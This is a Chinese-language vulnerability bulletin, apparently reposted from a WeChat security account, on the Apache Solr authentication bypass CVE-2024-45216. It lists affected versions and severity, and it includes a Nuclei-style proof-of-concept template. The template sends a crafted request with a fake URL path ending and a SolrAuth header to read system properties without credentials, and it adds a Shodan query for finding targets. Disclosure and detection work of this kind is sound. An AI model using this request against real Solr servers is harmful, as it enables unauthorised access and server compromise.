漏洞名称:
Apache Solr 认证绕过漏洞(CVE-2024-45216)
组件名称:
Apache-Solr
影响范围:
5.3.0 ≤ Apache Solr < 8.11.4
9.0.0 ≤ Apache Solr < 9.7.0
漏洞类型:
身份认证漏洞
利用条件:
1、用户认证:不需要用户认证
2、前置条件:默认配置
3、触发方式:远程
综合评价:
<综合评定利用难度>:容易,无需授权能导致服务器失陷。
<综合评定威胁等级>:严重,能造成服务器失陷。
官方解决方案:
已发布
攻击者可构造恶意请求利用 PKIAuthenticationPlugin 造成权限绕过,从而可在未认证的情况下调用。未授权的攻击者可以利用该漏洞绕过身份验证,严重可导致服务器失陷。
POC:
id: CVE-2024-45216 info: name: Apache Solr - Authentication Bypass author: gumgum severity: critical description: | Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0. impact: | Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue. reference: - https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr - https://nvd.nist.gov/vuln/detail/CVE-2024-45216 - https://solr.apache.org/security html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending - https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-45216 cwe-id: CWE-863,CWE-287 epss-score: 0.00043 epss-percentile: 0.09834 metadata: verified: true max-request: 1 shodan-query: http.html:"Apache Solr" tags: cve,cve2024,apache,solr,auth-bypass http: - raw: - | GET /solr/admin/info/properties:/admin/info/key HTTP/1.1 Host: {{Hostname}} SolrAuth: {{to_lower(rand_text_alpha(5))}} matchers-condition: and matchers: - type: word part: body words: - "responseHeader" - "system.properties" condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200
原文始发于微信公众号(b1gpig信息安全):漏洞推送POC:Apache Solr 认证绕过漏洞(CVE-2024-45216)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论